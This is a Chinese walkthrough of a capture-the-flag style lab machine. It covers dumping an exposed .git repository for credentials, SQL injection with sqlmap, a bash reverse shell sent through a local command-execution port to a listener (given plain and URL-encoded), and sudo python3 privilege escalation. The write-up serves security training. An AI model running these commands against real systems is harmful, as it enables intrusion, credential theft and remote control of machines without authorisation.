目录
信息收集
0x01 主机发现
arp-scan -l
0x02 端口扫描
发现文件目录/.git
nmap -p- -A -T5 -sV 129.168.113.139
0x03 访问地址
访问192.168.113.139,发现后台,访问目录。
0x04下载源代码分析工具进行源码分析
git clone https://github.com/lijiejie/GitHack.git --下载工具
cd GitHack.git --进入文件
python GitHack.py http://192.168.113.139/.git/ --运行py文件
tree --树状结构对源码进行分析,发现并无什么有用信息,在/config/config.php中发现mysql数据库的root账号密码:root:darkhole_2
下载另一个工具
git clone https://github.com/arthaud/git-dumper.git --工具下载
cd git-dumper --进入文件夹
python git_dumper.py http://192.168.56.147/.git/ website --运行程序
cd website
git log --查看log纪录
git --help
git diff a4d900a8d85e8938d3601f3cef113ee293028e10 --查看两次的差异性
得到邮箱:lush@admin.com 密码:321运行脚本的时候可能会出现报错的情况,下载一个包就好了
pip install -r requirements.txt --下载一个包
0x05 登入后台
登入后发现URL存在id=1这种字眼,尝试sql注入。
漏洞利用
0x06 sql注入
分别尝试
http://192.168.113.139/dashboard.php?id=1' --报错
http://192.168.113.139/dashboard.php?id=1’and1=1--+ --正常访问
尝试使用sqlmap去爆破
sqlmap -u http://192.168.113.139/dashboard.php?id=1 --cookie='PHPSESSID=hjm9ub21ovlbrus9rkgjn6n5r5' --dump --使用cookie爆破
发现ssh的账号密码
user:jehad
pass:fool
使用ssh连接,发现是一个普通用户权限
权限提升
0x07 内网信息收集
ls -al
cat .bash_history查看历史记录是发现本地端口9999存在命令执行漏洞,尝试执行之后,发现可以执行成功,并且发现这个漏洞的账号用户是losy
0x08 反弹shell
curl "http://127.0.0.1:9999/?cmd=bash -c 'exec bash -i &>/dev/tcp/192.168.113.128/7777 <&1'"
curl "http://127.0.0.1:9999/?cmd=%62%61%73%68%20%2d%63%20%27%65%78%65%63%20%62%61%73%68%20%2d%69%20%26%3e%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%31%33%2e%31%32%38%2f%37%37%37%37%20%3c%26%31%27"
--因为是curl执行,所以需要url编码
nc -vlp 7777 --kali监听
cd /home/losy
ls -al --查看文件
cat .bash_history --查看操作历史
发现losy的密码:gang
0x09 提权
ssh登入losy账号
使用sudo -l查看提权条件
使用python3提权
sudo /usr/bin/python3 -c 'import os;os.execl("/bin/bash")'
总结
本次靶场所运用到的知识点
1.源码分析(.git信息泄露)
2.sql注入
3.sudo提权(.bash_histroy历史命令提权)
扫一扫
1002
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
